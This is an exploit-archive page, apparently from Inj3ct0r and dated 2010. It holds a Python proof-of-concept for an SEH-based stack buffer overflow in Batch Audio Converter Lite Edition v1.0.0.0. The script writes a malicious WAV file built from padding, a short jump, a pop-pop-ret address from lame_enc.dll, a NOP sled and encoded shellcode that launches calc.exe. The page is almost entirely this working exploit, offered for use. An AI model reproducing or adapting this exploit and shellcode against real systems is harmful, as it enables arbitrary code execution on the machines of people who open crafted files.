Batch Audio Converter Lite Edition <= v1.0.0.0 Stack Buff

Posted on 17 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Batch Audio Converter Lite Edition &lt;= v1.0.0.0 Stack Buffer Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==========================================================================
Batch Audio Converter Lite Edition &lt;= v1.0.0.0 Stack Buffer Overflow (SEH)
==========================================================================


# Software Link:
http://www.freesoftwaretoolbox.com/files/batchaudio_setup.exe
# Tested on: Windows XP SP2
# Type of Vuln: SEH
# Code : bacon-exploit.py
# Greetz: Otoy, Postnix, Jasakom Community, Kilurah, Gesang, dan wedus-wedus
lainnya ^^
# Thanks: All OffSec member
 
#!/usr/bin/python
 
import struct
 
junk = &quot;A&quot; * 4132
nseh = &quot;xebx06x90x90&quot;
seh = struct.pack('&lt;L', 0x10029bb7) # pop edi pop esi ret from
lame_enc.dll
nop = &quot;x90&quot; * 30
print &quot;[+] Preparing for file..&quot;
# windows/exec, CMD=calc.exe, EXITFUNC=seh
# 463 bytes, x86/alpha_mixed
shellcode = (&quot;x89xe3xdbxc6xd9x73xf4x5ax4ax4ax4ax4ax4ax4ax4a&quot;
&quot;x4ax4ax4ax4ax43x43x43x43x43x43x37x52x59x6ax41&quot;
&quot;x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42&quot;
&quot;x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x49&quot;
&quot;x6cx49x78x4dx59x47x70x45x50x45x50x43x50x4cx49&quot;
&quot;x48x65x45x61x4ex32x42x44x4ex6bx50x52x44x70x4c&quot;
&quot;x4bx50x52x44x4cx4ex6bx42x72x45x44x4cx4bx43x42&quot;
&quot;x46x48x44x4fx4dx67x51x5ax46x46x44x71x4bx4fx44&quot;
&quot;x71x49x50x4ex4cx47x4cx51x71x51x6cx43x32x46x4c&quot;
&quot;x51x30x49x51x48x4fx46x6dx45x51x49x57x4dx32x48&quot;
&quot;x70x50x52x42x77x4cx4bx46x32x44x50x4cx4bx43x72&quot;
&quot;x47x4cx47x71x4ex30x4cx4bx47x30x51x68x4fx75x4f&quot;
&quot;x30x42x54x42x6ax46x61x4ax70x46x30x4cx4bx43x78&quot;
&quot;x46x78x4ex6bx43x68x47x50x45x51x4bx63x4bx53x47&quot;
&quot;x4cx47x39x4ex6bx47x44x4ex6bx46x61x48x56x50x31&quot;
&quot;x49x6fx50x31x4fx30x4cx6cx4bx71x4ax6fx44x4dx46&quot;
&quot;x61x48x47x46x58x4dx30x44x35x49x64x43x33x43x4d&quot;
&quot;x48x78x47x4bx51x6dx47x54x51x65x4bx52x43x68x4e&quot;
&quot;x6bx46x38x47x54x47x71x4ex33x43x56x4ex6bx46x6c&quot;
&quot;x50x4bx4cx4bx50x58x45x4cx46x61x4bx63x4ex6bx47&quot;
&quot;x74x4cx4bx43x31x4ax70x4cx49x42x64x44x64x46x44&quot;
&quot;x51x4bx51x4bx43x51x46x39x50x5ax42x71x4bx4fx4b&quot;
&quot;x50x46x38x51x4fx50x5ax4ex6bx45x42x48x6bx4cx46&quot;
&quot;x51x4dx51x7ax46x61x4cx4dx4fx75x4fx49x47x70x43&quot;
&quot;x30x43x30x46x30x42x48x50x31x4ex6bx50x6fx4dx57&quot;
&quot;x49x6fx4bx65x4fx4bx4bx4ex46x6ex50x32x49x7ax43&quot;
&quot;x58x4cx66x4fx65x4fx4dx4fx6dx4bx4fx48x55x47x4c&quot;
&quot;x47x76x51x6cx45x5ax4dx50x4bx4bx4dx30x44x35x43&quot;
&quot;x35x4dx6bx47x37x45x43x42x52x50x6fx51x7ax45x50&quot;
&quot;x51x43x49x6fx4bx65x43x53x45x31x42x4cx43x53x46&quot;
&quot;x4ex45x35x51x68x42x45x43x30x45x5ax41x41&quot;)
 
f = open('exploit.wav', 'w')
print &quot;[+] Writing vulnerable WAV file..&quot;
f.write(junk+nseh+seh+nop+shellcode)
f.close()
print &quot;[+] Success writing file..&quot;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20